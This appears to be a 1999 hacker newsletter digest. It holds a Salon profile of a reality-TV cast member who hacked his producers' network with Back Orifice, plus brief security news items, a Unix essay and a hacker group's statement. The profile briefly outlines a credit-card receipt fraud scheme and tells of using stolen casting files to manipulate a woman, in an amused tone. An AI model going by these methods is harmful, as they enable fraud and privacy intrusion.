Bunim. "When we met him, we were excited that his back story
didn't duplicate anyone else's. We didn't think a whole lot about
the danger of casting someone like Abe. Maybe we should have.
It's unnerving to feel that completely vulnerable."


And what does Abe have to say for himself? He doesn't offer any
excuses. But as we become acquainted, he does tell me that he
saw "Road Rules" as an opportunity for useful peer-group
therapy in the wake of his rather turbulent upbringing. The show
was a means, he says, "to be reconnected with my generation."

"As we see," he now admits, "that did not happen at all."

Abe was the second-youngest of seven children -- six of them
boys. Before he came along, his parents belonged to the Children
of God, a roving religious cult that emerged from the Jesus People
movement of the '60s. His parents deserted the sect after a few
years but maintained an itinerant lifestyle. The Ingersoll clan was
living in Twisp, Wash., in the basement of an Assemblies of God
church, when Abe entered the world on March 19, 1980. Later,
the family moved to a Mennonite commune in rural Illinois. On
"Road Rules," Abe can be heard lamenting the rigors of growing
up on welfare, mostly through the late '80s and early '90s.

Abe's father, Lewis Ingersoll, an affable man who laughs easily
and revels in the family's lore, downplays the hardships. "These
kids always emphasize things that, to me, are kind of a distortion,"

he says. "I had another son who went to Yale. He wrote a story
that was published in the paper about him and his older brother
getting in a dumpster."
And yet, as Ingersoll admits: "We did have
a period of time when we went through dumpsters. But hell, the
kids had more fun! Every dumpster we passed by, they'd want to
stop and go through it!"


The Ingersolls' marriage disintegrated in the late '80s. After
bearing seven children, Abe's mother "switched teams," as Abe
puts it. She and her partner got custody of the younger children,
including Abe. He lived with his mother in De Kalb, Ill., but after
a round of family counseling, he relocated to his father's home in
Peoria, where he lived from 1994 to 1997. Abe was 12 when he
first discovered computers, specifically a Toshiba laptop that his
dad brought home, which was running an old version of DOS.
Abe was a natural with computers. "I picked up the Toshiba,
fired up Procomm Plus, and that was the end of it,"
he says. He
started with dial-ups to local bulletin board systems. When a local
ISP hooked up its T-1 line in late 1994, Abe discovered the
Internet. "Of course I was their first customer," he says.

With no money to buy better computer equipment, and under the
influence of older hacker buddies he met while noodling around
online, Abe soon dived into deeper waters. Using discarded
credit-card receipts, he started ordering computer equipment
from pay phones, having the merchandise overnighted to vacant
houses. Before the shippers discovered the scam, he was long
gone with the booty. Eventually, his older brother Chase ratted
Abe out to his father, who turned his son in to the police. Abe
confessed all. He was slapped with 18 months of probation and
several hundred dollars in fines.

After this incident, Abe's father was ready for him to move on.
An uncle on his mother's side agreed to serve as Abe's new
mentor and guardian. Abe relocated to Los Angeles, entered high
school, dithered, dropped out by pulling what he calls "the Ferris
Bueller trick"
(back-dooring into the school's computers and
wiping clean all records of himself).

Abe was free, but he felt like he was missing out on something.
So he figured he should cap his adolescence with a lunge at TV
stardom. He decided to tough out the arduous "Road Rules"
casting process -- which begins with 5,000 applicants -- to try to
land a spot on the show.

What Abe got into was, of course, a real-life variation on "EDtv,"
in which everyone's existence is quasi-scripted by unseen hands.
"The big mindfuck of it all is that they control everything," Abe
says of Bunim and Murray. "From how much money you have to
where you're going to what you're doing. You have this set of
parameters you have to work within to, like, 'have fun.' You're on
'The Truman Show.' You just happen to know it."


"Basically you saw how mundane and silly a lot of it was," says
Abe. "These two burned-out soap opera producers are now
doing a show for MTV. They take thousands of hours of tape
and make it into -- whatever you call it. It's pretty much a joke."

(For the record: Bunim is a former soap opera producer; Murray
came out of news and documentary production.)
If Bunim and Murray were shocked that Abe hacked their
system, the first line of Abe's application questionnaire should
have been their first clue. Asked to "Describe your job," Abe
wrote: "Full time systems analyst (aka punk hacker kid)." Bunim
and Murray eventually lifted Abe's "punk hacker" wording for his
cast bio on the Road Rules Web site. But they just didn't get it.
Abe wasn't being cute with the hacking boast. He was being
honest.

The casting process started with a homemade tape in which Abe
introduced himself to the producers and proved that he looked
sharp on camera. A lengthy and repetitive series of interviews
followed; they were conducted mostly by phone, but a few were
held in the company's Van Nuys offices. It was during one of
those sessions that an interviewer challenged him about the
possibility of hacking the office computers.

"They said, 'So, Abe, what have you seen in our computer
system?' I just laughed because at that point I hadn't spent any
time at all investigating stuff. I don't know if they didn't think it
could happen or what. But when they offhandedly made a
remark, it kind of stuck in my mind. Then I got bored one night
and the next thing you know ..."


He quickly discovered a significant security flaw in the
Bunim/Murray network -- namely, that it had no security. The
company was running various incarnations of Windows, which,
according to Abe, contained gaping holes. Abe doesn't hang out
or correspond much with the hacker community -- "I'm not a
typical hacker!"
he insists -- but he does read "bug reports," in
which hackers list the flaws they've discovered in software
programs and operating systems. Drawing on that information and
several hours of trial and error, Abe found a point of entry. Then
he made a quick stop at Cult of the Dead Cow, an active hacker
site, where he downloaded a copy of Back Orifice, a "remote
control"
program that allows someone like Abe to operate a
Windows 95 machine from any location via the Internet.

With that capability, he was able to navigate the network and
uncover a huge storehouse of Bunim/Murray documents and files.
Most of it was eye-glazing stuff -- Excel spreadsheets, legalistic
internal memos and other mulch he didn't care about. "It's like a
vast empty void,"
he says. But he also found inside dope:
transcripts of casting interviews, meticulous logs of videotapes
describing every titter, jitter and palpitation of the characters
recorded on tape, story outlines for half-hour episodes distilled
from hundreds of hours of film time. This was Abe's pre-show
education, his own private screening room.

In typical exchanges, people were asked about their problems
growing up, about their appetites for sex. One guy is asked if it's
true that all men measure their penises. (His answer: I never
have.) "In the interviews they cover this huge range of topics, but
what it comes down to is the sex and the conflict,"
Abe observes.
"That's basically what the show revolves around."

Abe is probably right. I search through his archive for something,
anything, of deeper interest to mankind, but I come up empty.
For me, the sheer banality of it all is the most telling part. But
Abe, half my age and far more idealistic, got his hackles up about
the manipulative nature of the "Road Rules" experience. For that
reason, he felt no compunction about using the information he
gathered to take action. But instead of striking back at his
Orwellian puppet masters with some sort of brilliant megaprank
-- as he easily could have -- Abe used his insider knowledge to
bag a babe.

As the Latin America road trip got under way, Abe almost
immediately filled the role of black sheep. The show portrayed
him as a gadfly and a cad, whose idea of fun is to electronically
eavesdrop on another cast member's intimate phone call to a
girlfriend back home, while coolly plotting to seduce any female
who catches his fancy.

Abe wasn't secretive about his plans. On MTV's Web site, he's
quoted reflecting on his experience: "If there was one thing that I
was really 18 about, I said that I would get with all three girls ...
but in the same respect I'm kind of, you know, what else is a
horny young 18-year-old dude gonna do?"


"The degree of that surprised me," says Abe's uncle, Jon Burdick,
who guided Abe's move to California. "I knew he'd want to come
across as the wild one. But he doesn't ever really mean to hurt
anybody and he's surprised when he does. I think it's just the way
Bunim/Murray wants to cut it, for the sake of ratings."


Which brings us to the part of Abe's saga that connects his "Road
Rules"
hack to the now infamous fight with Gladys. While beetling
through the casting interviews from "Road Rules: Australia," Abe
found interviews with "Susie," an 18-year-old blond from
Pittsburgh. What Abe did not know as he perused her personal
effusions was that he would encounter Susie during the trip
through Latin America. As one in a series of contrivances known
as "missions" ("Go deep sea fishing!" "Fight a bull!"), the
producers arranged for the Australia cast to appear and
"challenge" the Latin America cast to a jet-ski competition. When
Abe glimpsed Susie in her wet suit, he felt an instant connection.
"A new way to meet girls in the '90s!" Abe laughs. "Beat them at
their own game. Know them better than they know themselves."


From reading Susie's interview, Abe learned enough to get her
attention. "I knew little tidbits. When I met her, it was like, 'Ha
ha! I've got information on you!'"
Then he made himself seem
really cool by telling her about the hack: "Just imagine a girl doing
this thing for the show -- and one of the kids on the show knows
you work in a video store, and that you got the information off of
Bunim/Murray's computer system. That's pretty impressive."


Impressive or not, it worked. Abe and Susie's affair was a
highlight of the series. In one shot, we see them strolling through a
balmy Mexican evening and smooching under the streetlights. The
next morning, as Abe and his Winnebago-riding mates pack up
for the day's adventures, the previous night's activities are,
understandably, the talk of the group. Susie has already been
spirited away, the Australia cast's mission accomplished. She isn't
around to defend her honor. That's when Gladys loses it. A feisty
native of Boston's inner-city Roxbury district, she announces that
she didn't like Susie and gets going on a judgmental diatribe
directed at Abe and his girlfriend-for-a-night. "She has no class!"

Gladys calls Abe a "coward" and, strangely, taunts him for his
unwillingness to strike her. Abe lashes back, blasting her as a
"psychotic bitch" and a "maniac." Suddenly, Gladys charges him
and -- bop! pow! -- she unleashes a flurry of blows that drops
Abe, who collapses onto a cot. The upshot of the fight: Abe
throws a fit, not without some justification. He threatens first to
call "the federales" and then, more realistically, a lawyer. The
Bunim/Murray contract prohibits violence among cast members.
Gladys gets a one-way ticket back to her Boston home and Abe
serves time as the group pariah, particularly in the eyes of the
remaining two female cast members. Apparently, the resentments
lingered well beyond the end of the experience. When asked in
January by a New Orleans newspaper to describe Abe, cast
member Sarah Martinez dubbed him "the asshole." This was the
same Sarah who, not knowing how correct she was, described
Abe on the air as "the type of person who'd read your journal."
Abe finds that comment offensive. "I never read anybody's
journal!"
he says, laughing.

The sojourn through Latin America is history, but Abe relived it
every Monday night as the episodes aired on MTV. Or at least,
he relived an approximation of it. "I talked to one of the other
guys in the cast recently,"
Abe says. "He watches the show and
says, 'That's not the trip I remember.'"
That's the way Abe feels,
too. "I had no idea that I'd be as big of a troublemaker as I ended
up being,"
he confesses. "I expected there'd be people just as bad
as me. Or just as interesting."


Abe peruses the alt.tv.road-rules newsgroup and sometimes
posts there when the commentary about him gets out of hand.
"I'm the one everyone likes to talk shit about," he sighs. But he's
also a favorite of female viewers. One e-mail from a young lady
-- offering to perform certain favors for him -- is printed out and
taped to his door. To better service his fans, Abe has created a
Web site, "Abecam," which features live, streamed video of his
daily activities.

Abe tells me that he rarely hacks anymore. In the end, it seems he
has learned a lesson from "Road Rules," just as the producers had
hoped. "It's just a vast empty void out there," he says. "Like
looking up somebody's asshole."

salon.com | July 21, 1999

- - - - - - - - - - - -

About the writer
Jonathan Vankin is a freelance journalist
in Los Angeles.

@HWA

28.0 This is just silly: BO2Kfun Page Shut Down From Overuse
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by RA
The web site of someone who hosted a screen shot of
someone's computer that had been owned with Back
Orifice 2000 had to be shut down from over use. The
site was generating one gigabyte of traffic per day.

BO2K Fun
http://www.altern.org/bo2kfun - nice expression on the poor sap's face though

@HWA


29.0 Man Sentenced for Using Cell Phone
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Code Kid
Neil Whitehouse, 28, was convicted of "recklessly and
negligently endangering"
a British Airways flight carrying
91 passengers from Madrid to Manchester after he
ignored repeated requests from the crew to switch off
his cell phone. He was sentenced to one year in jail.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2298512,00.html


--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Cell time for using cell phone
By Daniel Simpson, Reuters
July 21, 1999 11:28 AM PT
URL:

MANCHESTER, England -- A judge sentenced a British oil worker Wednesday to an
unprecedented one year's jail time for endangering an international flight by refusing to switch off
his mobile phone.

Neil Whitehouse, 28, was convicted of "recklessly and negligently endangering" a British Airways
flight carrying 91 passengers from Madrid to Manchester after he ignored repeated requests from
the crew to switch off his phone.

"You had no regard for the alarm that would be caused to passengers by your stubborn and
ignorant behavior,"
Judge Anthony Ensor told Whitehouse at Manchester crown court.

Ensor said the case was the first time anyone had been prosecuted in Britain for using a mobile
phone aboard a plane and there was no precedent to guide him on sentencing.

As serious as mid-flight violence
The sentence should serve as a warning that mobile phone use on planes, which is illegal in
Germany and the United States, would be treated as seriously as violence on board aircraft, Ensor
said.

Both British Airways and the Civil Aviation Authority (CAA), which
looks after the interests of all UK carriers, welcomed the landmark
ruling as a step in the right direction.

"We welcome the fact that the court has recognized the seriousness
of the hazard from mobile phones,"
BA spokesman Jamie Bowden
said.

Although Whitehouse made no airborne calls, aviation experts told a
three-day trial that radio waves from the phone could have sparked
an explosion or affected the Boeing 737's navigational systems as it
flew at 31,000 feet.

"The scientific evidence showed that there was a real possibility of
risk,"
Ensor said.

"You were sitting six meters (20 feet) away from 100 pieces of
complex electrical equipment,"
he told Whitehouse.

Whitehouse, who was sitting over the aircraft's wing fuel tanks, said he had just been preparing a
text message to send on his arrival in Manchester. Despite warnings from the pilot and crew he
kept his phone on.

Interference no big deal
His lawyer argued that any potential interference to the plane's systems would have been only for a
few seconds and could have been corrected.

Judge Ensor called for urgent new legislation specifically covering mobile phone use on planes
following CAA evidence given in the trial.

Detective Sergeant Rick Bates of Manchester Airport police agreed action was necessary.

"The possible consequences in this case could have been far more serious than from on-board
violence. Luckily they weren't but that is no guarantee for the future,"
he said.

@HWA

30.0 HILLARY CLINTON AND HACKERS
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From www.net-security.org

by BHZ, Thursday 22nd July 1999 on 12:57 am CET
It seems that someone who don't like Hillary Clinton tampered around DNS settings,
and forwarded Hillary Rodham Clinton For U.S. Senate Exploratory Committee
(www.hillary2000.org) to a site that is against her HillaryNo.com (www.hillaryno.com).
It looks like hacking also became a political weapon. Read the story below.

Hillary Gets Hacked

By James Ledbetter

NEW YORK – Is someone sympathetic to
New York City mayor Rudolph Giuliani playing
political tricks on Hillary Clinton's Web site?

That's the conclusion reached by some
staffers working with Hillary Clinton's Senate
exploratory committee.

On July 7, Hillary Clinton launched a Web
site, www.hillary2000.org, to promote her
probable run for the open New York seat in
the U.S. Senate. But a number of Web
surfers have found the site impossible to
reach, because their browsers go
automatically to a rival site,
www.hillaryno.com, which is maintained by
Friends of Giuliani. An expert in computer
hacking, Jerry Irvine, said the likely cause is
a partial "DNS poisoning" or "cache
poisoning"
hack, in which would-be site
users are rerouted en masse to a different
Web destination.

Drake Franklin, who works for a technology
manufacturer based in San Jose, Calif., said
that for several consecutive days he was
unable to access the official Hillary Clinton
site from the computer in his office. Even
though he typed in the proper Web address
for the official Clinton site, his browser
consistently went to the rival site. "I
checked with other people in the office, and
they get linked to the real Hillary Clinton
site, but my computer still seems trapped on
the [hillaryno.com] site,"
Franklin said. He
got the same result no matter what browser
he used.

Hockaday Donatelli Campaign Solutions, the
firm that maintains the Hillaryno.com site,
denied any involvement in hacking the rival
site and said it was unaware of the
maneuver until contacted by a reporter.
"This is not a good thing," said Becky
Donatelli, cochair of the Virginia-based
consulting firm that has built Web sites for a
large number of Republican candidates. "I
would hate for this to happen to one of our
clients."


A source from Clinton's camp affirmed that
the committee is aware of the glitch. At
least three other users from other areas of
the country have experienced the same
unintended rerouting of their browsers, the
Clinton source said, noting that no incidents
have been reported in the last few days.
The committee could not explain why or how
the rerouting occurred.

The incident demonstrates that hacking has
been added to the menu of dirty tricks
available to political candidates, would-be
candidates and their allies. Web-site hacking
can be especially effective because it is
hard to trace.

The activity is very likely against the law,
said Irvine, director of media and public
relations at Infrastructure Defense, a
Virginia-based technology-security firm. "To
divert individual computers, you would've
had to have gotten root access, in order to
change the DNS entry,"
he said. "They would
almost have to have committed an illegal
act."
Irvine added that most such hacks are
designed to spread throughout multiple
networks, but that this one appears to have
affected only one server. Still, that would be
enough to divert hundreds of would-be
visitors to Hillary2000.org, if the Internet
happened to route them through the hacked
server at a given moment.

The Hillaryno.com site came online in late
March, and is marked "Paid for and Copyright
1999 Friends of Giuliani."
It labels itself "a Web site dedicated to the
notion that we should expect more from someone who aspires to the
U.S. Senate. That the U.S. Senate is a place for proven leaders, not
a proving ground."
Although Giuliani has not declared himself a
candidate for the Senate seat opened by the retirement of Daniel
Patrick Moynihan, he is widely considered to be seeking the
Republican nomination.

@HWA

31.0 SAMBA 2.0.5 SECURITY FIXES
~~~~~~~~~~~~~~~~~~~~~~~~~~

From www.net-security.org

by BHZ, Thursday 22nd July 1999 on 1:05 am CET
Samba 2.0.5 has been released and it fixes couple of security holes (denial of service
attack on nmbd, buffer overflow in the message service in smbd and a race condition
in smbmnt which would allow a user to mount at arbitrary points in the filesystem).
Check out the site - http://www.samba.org.

@HWA

32.0 SECURITY STANDARDS FOR BANKING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From www.net-security.org

by BHZ, Thursday 22nd July 1999 on 5:34 am CET
Banking Industry Technology Secretariat (BITS), a technology consortium of the
nation's biggest banks announced that the main problem which is holding back online
banking and financial services is a lack of standards. Next week they are opening
"security laboratory" which will certify security software for usage in banking
business.


@HWA

33,0 What makes UNIX users so smart? (well some of em)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.insecure.org/reading.html

The Elements Of Style:
UNIX As Literature

If there's nothing different about UNIX people, how come so
many were liberal-arts majors? It's the love of words that
makes UNIX stand out.

Thomas Scoville

In the late 1980s, I worked in the advanced R&D arm of the Silicon
Valley's regional telephone company. My lab was populated mostly by
Ph.D.s and gifted hackers. It was, as you might expect, an all-UNIX
shop.

The manager of the group was an
exception: no advanced degree, no
technical credentials. He seemed pointedly
self-conscious about it. We suspected he
felt (wrongly, we agreed) underconfident of
his education and intellect. One day, a story
circulated through the group that confirmed
our suspicions: the manager had confided
he was indeed intimidated by the
intelligence of the group, and was taking
steps to remedy the situation. His
prescription, though, was unanticipated: "I need to become more of an
intellectual,"
he said. "I'm going to learn UNIX."

Needless to say, we made more than a little fun out of this. I mean,
come on: as if UNIX could transform him into a mastermind, like the
supplicating scarecrow in "The Wizard of Oz." I uncharitably imagined
a variation on the old Charles Atlas ads: "Those senior engineers will
never kick sand in my face again."


But part of me was sympathetic: "The boss isn't entirely wrong, is he?
There is something different about UNIX people, isn't there?"
In the
years since, I've come to recognize what my old manager was getting
at. I still think he was misguided, but in retrospect I think his belief was
more accurate than I recognized at the time.

To be sure, the UNIX community has its own measure of technical
parochialism and nerdy tunnel vision, but in my experience there
seemed to be a suspicious overrepresentation of polyglots and
liberal-arts folks in UNIX shops. I'll admit my evidence is sketchy and
anecdotal. For instance, while banging out a line of shell, with a fellow
engineer peering over my shoulder, I might make an intentionally
obscure literary reference:

if test -z `ps -fe | grep whom`
then
echo ^G
fi
# Let's see for whom the bell tolls.

UNIX colleagues were much more likely to recognize and play in a
way I'd never expect in the VMS shops, IBM's big-iron data centers,
or DOS ghettos on my consulting beat.

Being a liberal-arts type myself (though I cleverly concealed this in my
resume), I wondered why this should be true. My original
explanation--UNIX's historical association with university computing
environments, like UC Berkeley's--didn't hold up over the years; many
of the UNIX-philiacs I met came from schools with small or absent
computer science departments. There had to be a connection, but I
had no plausible hypothesis.

It wasn't until I started regularly asking UNIX refuseniks what they
didn't like about UNIX that better explanations emerged.

Some of the prevailing dislike had a distinctly populist flavor--people
caught a whiff of snobbery about UNIX and regarded it with the same
proletarian resentment usually reserved for highbrow institutions like
opera or ballet. They had a point: until recently, UNIX was the lingua
franca of computing's upper crust. The more harried, practical, and
underprivileged of the computing world seemed to object to this aura
of privilege. UNIX adepts historically have been a coddled bunch, and
tend to be proud of their hard-won knowledge. But these class
differences are fading fast in modern computing environments. Now
UNIX engineers are more common, and low- or no-cost UNIX
variations run on inexpensive hardware. Certainly UNIX folks aren't as
coddled in the age of NT.

There was a standard litany of more specific criticisms: UNIX is
difficult and time-consuming to learn. There are too many things to
remember. It's arcane and needlessly complex.

But the most recurrent complaint was that it was too text-oriented.
People really hated the command line, with all the utilities, obscure
flags, and arguments they had to memorize. They hated all the typing.
One mislaid character and you had to start over. Interestingly, this
complaint came most often from users of the GUI-laden Macintosh or
Windows platforms. People who had slaved away on DOS batch
scripts or spent their days on character-based terminals of multiuser
non-UNIX machines were less likely to express the same grievance.

Though I understood how people might be put off by having to
remember such willfully obscure utility names like cat and grep, I
continued to be puzzled at why they resented typing. Then I realized I
could connect the complaint with the scores of "intellectual elite" (as my
manager described them) in UNIX shops. The common thread was
wordsmithing; a suspiciously high proportion of my UNIX colleagues
had already developed, in some prior career, a comfort and fluency
with text and printed words. They were adept readers and writers, and
UNIX played handily to those strengths. UNIX was, in some sense,
literature to them. Suddenly the overrepresentation of polyglots,
liberal-arts types, and voracious readers in the UNIX community didn't
seem so mysterious, and pointed the way to a deeper issue: in a world
increasingly dominated by image culture (TV, movies, .jpg files),
UNIX remains rooted in the culture of the word.

UNIX programmers express themselves in a rich vocabulary of system
utilities and command-line arguments, along with a flexible, varied
grammar and syntax. For UNIX enthusiasts, the language becomes
second nature. Once, I overheard a conversation in a Palo Alto
restaurant: "there used to be a shrimp-and-pasta plate here under ten
bucks. Let me see...cat menu | grep shrimp | test -lt
$10..."
though not syntactically correct (and less-than-scintillating
conversation), a diner from an NT shop probably couldn't have
expressed himself as casually.

With UNIX, text--on the command line, STDIN, STDOUT,
STDERR--is the primary interface mechanism: UNIX system utilities
are a sort of Lego construction set for word-smiths. Pipes and filters
connect one utility to the next, text flows invisibly between. Working
with a shell, awk/lex derivatives, or the utility set is literally a word
dance.

Working on the command line, hands poised over the keys
uninterrupted by frequent reaches for the mouse, is a posture familiar
to wordsmiths (especially the really old guys who once worked on
teletypes or electric typewriters). It makes some of the same demands
as writing an essay. Both require composition skills. Both demand a
thorough knowledge of grammar and syntax. Both reward mastery
with powerful, compact expression.

At the risk of alienating both techies and writers alike, I also suggest
that UNIX offers something else prized in literature: a coherence, a
consistent style, something writers call a voice. It doesn't take much
exposure to UNIX before you realize that the UNIX core was the
creation of a very few well-synchronized minds. I've never met Dennis
Ritchie, Brian Kernighan, or Ken Thompson, but after a decade and a
half on UNIX I imagine I might greet them as friends, knowing
something of the shape of their thoughts.

You might argue that UNIX is as visually oriented as other OSs.
Modern UNIX offerings certainly have their fair share of GUI-based
OS interfaces. In practice though, the UNIX core subverts them; they
end up serving UNIX's tradition of word culture, not replacing it. Take
a look at the console of most UNIX workstations: half the windows
you see are terminal emulators with command-line prompts or vi jobs
running within.

Nowhere is this word/image culture tension better represented than in
the contrast between UNIX and NT. When the much-vaunted
UNIX-killer arrived a few years ago, backed by the full faith and
credit of the Redmond juggernaut, I approached it with an open mind.
But NT left me cold. There was something deeply unsatisfying about it.
I had that ineffable feeling (apologies to Gertrude Stein) there was no
there there. Granted, I already knew the major themes of system and
network administration from my UNIX days, and I will admit that
registry hacking did vex me for a few days, but after my short scramble
up the learning curve I looked back at UNIX with the feeling I'd been
demoted from a backhoe to a leaf-blower. NT just didn't offer room
to move. The one-size-fits-all, point-and-click,
we've-already-anticipated-all-your-needs world of NT had me
yearning for those obscure command-line flags and man -k. I wanted
to craft my own solutions from my own toolbox, not have my ideas
slammed into the visually homogenous, prepackaged, Soviet world of
Microsoft Foundation Classes.

NT was definitely much too close to image culture for my comfort:
endless point-and-click graphical dialog boxes, hunting around the
screen with the mouse, pop-up after pop-up demanding my attention.
The experience was almost exclusively reactive. Every task demanded
a GUI-based utility front-end loaded with insidious assumptions about
how to visualize (and thus conceptualize) the operation. I couldn't think
"outside the box" because everything literally was a box. There was no
opportunity for ad hoc consideration of how a task might alternately be
performed.

I will admit NT made my life easier in some respects. I found myself
doing less remembering (names of utilities, command arguments,
syntax) and more recognizing (solution components associated with
check boxes, radio buttons, and pull-downs). I spent much less time
typing. Certainly my right hand spent much more time herding the
mouse around the desktop. But after a few months I started to get a
tired, desolate feeling, akin to the fatigue I feel after too much channel
surfing or videogaming: too much time spent reacting, not enough spent
in active analysis and expression. In short, image-culture burnout.

The one ray of light that illuminated my tenure in NT environments was
the burgeoning popularity of Perl. Perl seemed to find its way into NT
shops as a CGI solution for Web development, but people quickly
recognized its power and adopted it for uses far outside the scope of
Web development: system administration, revision control, remote file
distribution, network administration. The irony is that Perl itself is a
subset of UNIX features condensed into a quick-and-dirty scripting
language. In a literary light, if UNIX is the Great Novel, Perl is the
Cliffs Notes.

Mastery of UNIX, like mastery of language, offers real freedom. The
price of freedom is always dear, but there's no substitute. Personally,
I'd rather pay for my freedom than live in a bitmapped, pop-up-happy
dungeon like NT. I'm hoping that as IT folks become more seasoned
and less impressed by superficial convenience at the expense of real
freedom, they will yearn for the kind of freedom and responsibility
UNIX allows. When they do, UNIX will be there to fill the need.


Thomas Scoville has been wrestling with UNIX since 1983. He
currently works at Expert Support Inc. in Mountain View, CA.

@HWA

34.0 Statement by Legions of the Underground Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Steve
Optiklenz (Steve Skanton) has asked HNN to publish a
statement concerning past events involving Legions of
the Underground. The statement also comments on the
current state of .gov and .mil web page defacements.

Optiklenz's New Statement; July 23rd 1999

Statement of Optiklenz (Steve Stakton), of Legions of the Underground

Something needs to be said...

First off...
Earlier this year an assembly of organizations decided to
release a joint statement "condemning" Legions. This
evidently was before any of them contacted Legions
requesting information on what the true plight was.
Because of some iniquitous media converage a few people
misunderstood our motives. This of course is in regards to
the past "China Human Rights incident".

We wanted to bring a tragic predicament to surface so
other people could speak out as well. The media was
misinformed when they reported about our goals to aid
these countries in their fight for freedom of speech. They
(the media) stated we (Legions) wanted to damge certain
computer networks in other parts of the world. We
wanted to help them with the situation concerning their
lack of freedom, and human rights why would we want to
destroy or damage their networks the same networks that
give them what little freedom they have to communicate
as people. That just makes no sense at all. I ask that the
people who joined to make the statement condemning
Legions take that into consideration and next time
contact us so that we could discuss things, and clear up
misunderstandings. It's not a funny matter when peoples
lives, and reputations are at stake.

As hackers the computer has built our lives, and in turn
we have built our lives around the computer we would
never choose to harm such a valuable resource. The term
hacker doesn't discriminate. You can be a federal agent,
but the best damn coder in the world and in the sense of
the word you'll be a hacker. Bill Gates, a hacker turned
billionaire. Software designers, security specialist the
people who help protect your networks these people are
hackers. "Information, and data is to be cherished, (for it
can only build you not hurt you) cultivated and developed
not to be annulled or locked up. Hacking is an expansive
applied knowledge in any technical field. Destruction, and
the unschooled acts of those who live with out moral are
what separates the "
hackers" (those who's main purpose
of life is to learn, expand, and apply what they learn) from
those that go as far as turning the computer on."
(-The
previous quoted statement was excerpted from Keen
Veracity 3 www.underzine.com).

Something serious is going on at the moment. A string of
"attacks" against our own government. And till now no one
has said anything. The actions of these groups are
sincerely half-witted, and absurd for it will at the end
accomplish nothing except a few more long term jail
sentences. The current actions of these self-proclaimed
"hackers" have me infuriated. The people DOS'ing
government sites, and defacing mil, and gov domains, and
damaging information these people aren't hackers they are
nothing more than unschooled adolescent teens with
nothing better on their hands. They are an endangerment
to the true aspect of computer science dealt with by the
hacker community. Call what they are doing what you
want, but don't call it "hacking" because it's not. So many
articles have surfaced which referred to what these
cracker cults are doing as "hacking" ex; "Hackers attack
government"
- "Hackers strike again" (false) Call them
destructive call them by their first name but for the sake
of god don't just yank out the term "hackers" for a better
story for the sake of god don't defile the name "hacker"
for your personal gain. A hacker lives by a strong code of
ethics. We wouldn't be issuing this statement if we didn't.

A government investigation is currently pending on the
above matters If we dont do something about this now
the government will surely hold us accountable, and I'm
not talking jail time. We have a lot to lose if we dont stop
these people from making us look bad. Though we are not
affliated with them directly certain mainstream media has
left a misleading trail. Some of our rights as computer
partisans may be a stake here. With that said I ask that
all sites that archive these senseless hacks suspend
documenting these fatuous acts for the time being. The
script kiddies that go out and target government and
military servers are media crazy, and you are only adding
fuel to their fire by flashing their work to the public. A
note to the lamers This is where it ENDS... In the end it's
what you choose to do that makes you who you are. So
make sure what you choose to do doesn't make you look
like an ass.

www.hackernews.com/archive/1999/noaa/index.html
www.hackernews.com/archive/1999/army/index.html
www.hackernews.com/archive/1999/monmouth/index.html
www.hackernews.com/archive/1999/argonne/index.html
www.hackernews.com/archive/1999/nswcl/index.html
www.hackernews.com/archive/1999/senate2/index.html
www.hackernews.com/archive/1999/bnl/index.html
www.hackernews.com/archive/1999/doi/index.html

The above is an archive of recent government, and
military site defacements done by what seems to be
comparable to the works of 5 year olds...

Look at the archived sites, and tell me something doesn't
need to be done.

Just letting people know we aren't going for their childish
actions. We dont advocate any of the trash being done
by these uninspired idiots. we're "hackers" the other white
meat!

------------------001--------------------------------
t

  
he below is an email, and responce excerpted from Keen
Veracity 4
-----------------------------------------------------
[mail]
Do you still hack?

[responce]

Well it depends on your analogue of hacking. By the
authentic formalization I "hack" everyday. Whether I'm
coding, or doing Network checks it's still hacking. Hacking
has little to do with the "illegal" entry of computer
systems apart from the Technical, and systematic aspect
of it. Illegally accessing a system for no intended reason is
not something I advocate or advise performing. What I
suggest achieving is going out, and learning, and
questioning the system itself before trying to exploit it.
And even once you feel you have a broad knowledge of
the system make sure you use what you know to build
things, and not fuck things up. System admins who are
affected by crackers turn to hackers in order to secure
their systems. They turn to the philosophies, documents,
and programs written by "hackers"... Let's not make them
look the other way. We are here, and we are skilled. What
your brain dead system administrator can do in a week we
can accomplish in a matter of minutes more practically.
That's the message that should be put across. One of
positively not one that says "Were going to take you
down."
Read my introduction in Keen Veracity 3 I go into
greater detail on the subject at hand.
http://www.t00ned.org/optik/kv/kv3.txt

-Steve Stakton

Steve Stakton - optik@shockimaging.com -(optiklenz)
-Head Security Advisor for NACC

Legions Of the Underground - Our title name is not meant
to seem dark. Don't get the misconception that we are
some sort of cult or only wear black. The computer
Underground is a symbol something that is important, and
we treasure it's existence so in it's honor we use Legions
Of the Underground. We are just a bunch of computer
enthusiast who enjoy working together. Nothing more
nothing less.

HNN Archive for December 19, 1999 - LoU Declares War
http://www.hackernews.com/archive.html?122998.html

HNN Archive for January 7, 1999 - Joint Statement Condemning LoU
http://www.hackernews.com/archive.html?010799.html

Chronological Listing of Past Events
http://www.hackernews.com/archive/louwar/louhist.html

Chronology in Brief from HNN;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The LoU-China-Iraq War Histograph


Below is an attempt to chronicle the events in the
LoU-China-Iraq War. We have made every attempt to be
accruate. If you have corrections to be made please send
us mail.


October 26, 1998
In an attempt to polish its tarnished human-rights image
China launches a web site to give their perspective on the
issue.
Wired
http://www.wired.com/news/news/politics/story/15831.html

October 27, 1998
Legions of the Underground defaces the Chinese human
rights web site that went online the day before.
Wired
http://www.wired.com/news/news/politics/story/15831.html
www.humanrights-china.org
HNN Archive of Hacked Page
http://www.hackernews.com/archive/china1098/ChinaFuckOff.html
HNN Archive for October 28, 1998
http://www.hackernews.com/archive.html?102898.html

December 1, 1998
